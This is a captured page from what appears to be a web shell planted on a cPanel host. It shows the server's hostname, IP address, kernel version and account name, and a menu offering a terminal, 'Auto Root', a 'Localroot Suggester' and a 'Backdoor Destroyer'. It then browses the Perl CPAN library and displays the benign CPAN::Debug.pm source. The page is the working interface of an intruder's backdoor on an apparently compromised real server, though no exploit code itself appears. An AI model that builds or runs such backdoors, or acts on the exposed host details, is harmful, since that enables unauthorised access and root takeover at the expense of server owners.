Linux cpanel2.daytoncreative.net 2.6.32-754.29.2.el6.x86_64 #1 SMP Tue May 12 17:39:04 UTC 2020 x86_64
Apache/2.4.43 (cPanel) OpenSSL/1.1.1g mod_bwlimited/1.4
Server IP : 70.62.220.67 & Your IP : 216.73.216.193
Domains :
Cant Read [ /etc/named.conf ]
User : michaelgreg
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
var /
log /
perl-5.20.2 /
lib /
CPAN /
Delete
Unzip
Name
Size
Permission
Date
Action
API
[ DIR ]
drwxr-xr-x
2016-10-10 17:36
Exception
[ DIR ]
drwxr-xr-x
2016-10-10 17:36
FTP
[ DIR ]
drwxr-xr-x
2016-10-10 17:36
HTTP
[ DIR ]
drwxr-xr-x
2016-10-10 17:36
Kwalify
[ DIR ]
drwxr-xr-x
2016-10-10 17:36
LWP
[ DIR ]
drwxr-xr-x
2016-10-10 17:36
Meta
[ DIR ]
drwxr-xr-x
2016-10-10 17:36
Author.pm
6.68
KB
-r--r--r--
2015-01-31 21:57
Bundle.pm
9.3
KB
-r--r--r--
2014-12-27 11:48
CacheMgr.pm
7.48
KB
-r--r--r--
2015-01-31 21:57
Complete.pm
5.88
KB
-r--r--r--
2014-12-27 11:48
Debug.pm
2.05
KB
-r--r--r--
2014-12-27 11:48
DeferredCode.pm
189
B
-r--r--r--
2014-12-27 11:48
Distribution.pm
156.19
KB
-r--r--r--
2014-12-27 11:48
Distroprefs.pm
11.71
KB
-r--r--r--
2014-12-27 11:48
Distrostatus.pm
972
B
-r--r--r--
2014-12-27 11:48
FTP.pm
41.22
KB
-r--r--r--
2015-01-31 21:57
FirstTime.pm
68.42
KB
-r--r--r--
2014-12-27 11:48
HandleConfig.pm
22.76
KB
-r--r--r--
2015-01-31 21:57
Index.pm
21.69
KB
-r--r--r--
2015-01-31 21:57
InfoObj.pm
6.75
KB
-r--r--r--
2014-12-27 11:48
Kwalify.pm
3.35
KB
-r--r--r--
2014-12-27 11:48
Meta.pm
26.86
KB
-r--r--r--
2014-12-27 11:49
Mirrors.pm
16.3
KB
-r--r--r--
2015-01-31 21:57
Module.pm
21.52
KB
-r--r--r--
2014-12-27 11:48
Nox.pm
953
B
-r--r--r--
2014-12-27 11:48
Prompt.pm
567
B
-r--r--r--
2014-12-27 11:48
Queue.pm
6.78
KB
-r--r--r--
2014-12-27 11:48
Shell.pm
77.76
KB
-r--r--r--
2014-12-27 11:48
Tarzip.pm
16.32
KB
-r--r--r--
2014-12-27 11:48
URL.pm
588
B
-r--r--r--
2014-12-27 11:48
Version.pm
4.29
KB
-r--r--r--
2014-12-27 11:48
Save
Rename
# -*- Mode: cperl; coding: utf-8; cperl-indent-level: 4 -*- package CPAN::Debug; use strict; use vars qw($VERSION); $VERSION = "5.5001"; # module is internal to CPAN.pm %CPAN::DEBUG = qw[ CPAN 1 Index 2 InfoObj 4 Author 8 Distribution 16 Bundle 32 Module 64 CacheMgr 128 Complete 256 FTP 512 Shell 1024 Eval 2048 HandleConfig 4096 Tarzip 8192 Version 16384 Queue 32768 FirstTime 65536 ]; $CPAN::DEBUG ||= 0; #-> sub CPAN::Debug::debug ; sub debug { my($self,$arg) = @_; my @caller; my $i = 0; while () { my(@c) = (caller($i))[0 .. ($i ? 3 : 2)]; last unless defined $c[0]; push @caller, \@c; for (0,3) { last if $_ > $#c; $c[$_] =~ s/.*:://; } for (1) { $c[$_] =~ s|.*/||; } last if ++$i>=3; } pop @caller; if ($CPAN::DEBUG{$caller[0][0]} & $CPAN::DEBUG) { if ($arg and ref $arg) { eval { require Data::Dumper }; if ($@) { $CPAN::Frontend->myprint("Debug(\n" . $arg->as_string . ")\n"); } else { $CPAN::Frontend->myprint("Debug(\n" . Data::Dumper::Dumper($arg) . ")\n"); } } else { my $outer = ""; local $" = ","; if (@caller>1) { $outer = ",[@{$caller[1]}]"; } $CPAN::Frontend->myprint("Debug(@{$caller[0]}$outer): $arg\n"); } } } 1; __END__ =head1 NAME CPAN::Debug - internal debugging for CPAN.pm =head1 LICENSE This program is free software; you can redistribute it and/or modify it under the same terms as Perl itself. =cut